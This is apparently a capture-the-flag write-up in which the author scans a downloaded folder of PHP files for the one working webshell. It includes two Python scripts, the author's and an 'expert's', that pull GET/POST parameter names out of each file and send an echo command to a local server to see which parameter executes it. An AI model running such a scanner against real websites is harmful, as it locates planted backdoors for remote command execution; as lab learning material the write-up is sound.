Following the hint, download the source code from url/www.tar.gz.





Open a few of the files at random and take a look.



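There are a lot of shells, but most of them do not work, so the task must be to find the one that can actually be exploited. In other words, this challenge is really a test of scripting ability. Here is the script I wrote myself (python3):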

import os
import re
import requests
from multiprocessing import Pool

# Raw string so the backslashes in the Windows path are not treated as escapes
filePath = r"E:\phpstudy_pro\WWW\src"
url = "http://127.0.0.1:8003/"
shell = "echo 'this is'"

# List the files in the source directory
def readFileName():
    return os.listdir(filePath)

# Collect the GET and POST parameter names used in a file, then test them
def getReq(fileName):
    f = os.path.join(filePath, fileName)
    with open(f, 'r') as file:
        file_data = file.read()
    # GET parameters
    rpGet = re.findall(r"_GET\['(.*?)'", file_data)
    # print(rpGet)
    # POST parameters
    rpPost = re.findall(r"_POST\['(.*?)'", file_data)
    # print(rpPost)
    # Verify the requests
    isSuccess(fileName, gets=rpGet, posts=rpPost)

def isSuccess(fileName, gets, posts):
    # Use a new local name: assigning to `url` here would raise UnboundLocalError
    target = url + fileName
    print(fileName)
    # Threads could be started here
    for get in gets:
        if sendGet(get, target):
            print(fileName + " " + get + " yes")
    # for post in posts:
    #     if sendPost(post, target):
    #         print(fileName + " " + post + " yes")

def sendGet(get, url):
    url += "?" + get + "=" + shell
    response = requests.get(url)
    if "this is" in response.text:
        print(url)
        return True
    return False

def sendPost(post, url):
    data = {post: shell}
    response = requests.post(url, data)
    if "this is" in response.text:
        print(url)
        return True
    return False

if __name__ == '__main__':
    print("----start----")
    pool = Pool(10)
    pool.map(getReq, readFileName())  # blocks until every file has been processed
    pool.close()  # close the pool; it accepts no new tasks afterwards
    pool.join()   # wait for all worker processes to finish; must come after close()
    print("-----end-----")

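My own script never ran to completion, and for some reason I could not get the expert's script to work either. I suspect the problem is my computer: with only 3 processes running, the CPU was already at 100%. I had planned to add threads around the GET and POST requests, which should have made things quite a bit faster, but on this machine it looks like that would make no difference.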
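The threading idea mentioned above can be sketched roughly as follows. Each probe spends most of its time waiting on the HTTP response, so a thread pool is usually lighter on the CPU than more processes. This is only a sketch under assumptions: `probe_all` and the `probe` callback are hypothetical names that appear in neither script, and in real use `probe` would wrap something like `sendGet`.

```python
from concurrent.futures import ThreadPoolExecutor


def probe_all(candidates, probe, max_workers=20):
    """Run probe(file_name, param) for every candidate pair in a thread pool.

    candidates: iterable of (file_name, param) tuples.
    probe: hypothetical callback that returns True when the parameter
           turns out to execute the test command.
    Returns the pairs for which probe returned True, in input order.
    """
    candidates = list(candidates)
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        # executor.map yields results in the same order as the inputs
        results = list(executor.map(lambda pair: probe(*pair), candidates))
    return [pair for pair, ok in zip(candidates, results) if ok]


if __name__ == "__main__":
    # Stand-in probe so the sketch runs without a web server (made-up data)
    def fake_probe(file_name, param):
        return (file_name, param) == ("b.php", "cmd")

    pairs = [("a.php", "x"), ("b.php", "cmd"), ("c.php", "y")]
    print(probe_all(pairs, fake_probe))
```

Passing the probe in as a callback keeps the scheduling separate from the HTTP code, so the same function works for GET and POST checks.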

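The result can definitely be obtained this way, though. I ran the script directly against the file that contains the working shell to see how it behaves.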
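Checking a single file comes down to two steps: pull the parameter names out of the PHP source, then build one probe URL per name. A minimal sketch of those two steps, with no network access, might look like this. The helper names `extract_params` and `build_probe_urls` and the sample PHP line are assumptions made for illustration, not part of the challenge files.

```python
import re
from urllib.parse import quote

# Match $_GET['name'] and $_POST['name'] and capture the name
GET_PARAM = re.compile(r"\$_GET\['(.*?)'\]")
POST_PARAM = re.compile(r"\$_POST\['(.*?)'\]")


def extract_params(php_source):
    """Return (gets, posts): sorted, de-duplicated parameter names."""
    gets = sorted(set(GET_PARAM.findall(php_source)))
    posts = sorted(set(POST_PARAM.findall(php_source)))
    return gets, posts


def build_probe_urls(base_url, file_name, gets, payload="echo 'this is'"):
    """Build one URL per GET parameter, with the payload URL-encoded."""
    return [f"{base_url}{file_name}?{name}={quote(payload)}" for name in gets]


if __name__ == "__main__":
    # Made-up PHP snippet standing in for one of the challenge files
    sample = "<?php system($_GET['abc']); eval($_POST['xyz']); ?>"
    gets, posts = extract_params(sample)
    print(gets, posts)
    print(build_probe_urls("http://127.0.0.1:8003/", "a.php", gets))
```

De-duplicating the names avoids sending the same request several times when a file reads one parameter more than once.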

Also attached is the expert's code (python2):

import os
import requests
from multiprocessing import Pool

path = "I:/phpStudy/PHPTutorial/WWW/src/"
files = os.listdir(path)
url = "http://localhost/src/"

# Collect the $_GET parameter names used in one file
def extract(f):
    gets = []
    with open(path+f, 'r') as fp:
        lines = fp.readlines()
        lines = [i.strip() for i in lines]
        for line in lines:
            # >= 0 so that a match at the very start of the line is not skipped
            if line.find("$_GET['") >= 0:
                start_pos = line.find("$_GET['") + len("$_GET['")
                end_pos = line.find("'", start_pos)
                gets.append(line[start_pos:end_pos])
    return gets

# Test the files whose indexes fall in [start, end)
def exp(start, end):
    for i in range(start, end):
        filename = files[i]
        gets = extract(filename)
        print "try: %s" % filename
        for get in gets:
            new_url = "%s%s?%s=%s" % (url, filename, get, 'echo "got it"')
            r = requests.get(new_url)
            if 'got it' in r.content:
                print new_url
                break

def main():
    pool = Pool(processes=15)
    step = max(1, len(files)/15)
    for i in range(0, len(files), step):
        # The original passed "+len(files)/15" as the end index, which left every
        # slice after the first one empty; "i + step" is presumably what was meant
        pool.apply_async(exp, (i, min(i + step, len(files)),))
    pool.close()
    pool.join()

if __name__ == "__main__":
    main()
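The slicing in `main()` is easy to get wrong, so here is a small Python 3 sketch of how the file list could be divided into index ranges, one per worker. `split_ranges` is a hypothetical helper, not something taken from the expert's script.

```python
def split_ranges(total, workers):
    """Return (start, end) index pairs that cover range(total).

    At most `workers` slices are produced, and the last one is
    shortened so that `end` never runs past `total`.
    """
    if total <= 0 or workers <= 0:
        return []
    size = -(-total // workers)  # ceiling division
    return [(start, min(start + size, total)) for start in range(0, total, size)]


if __name__ == "__main__":
    # 10 files shared among 3 workers
    print(split_ranges(10, 3))  # [(0, 4), (4, 8), (8, 10)]
```

Each pair can be passed straight to a function like `exp(start, end)`, and clamping the end index avoids an IndexError on the final slice.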

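Although in the end I never got my own script to run all the way through, I still learned a lot. I spent two days reading about Python crawlers, learned how to write a simple one, and looked into regular expressions and process pools.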

Keep going, let's do this!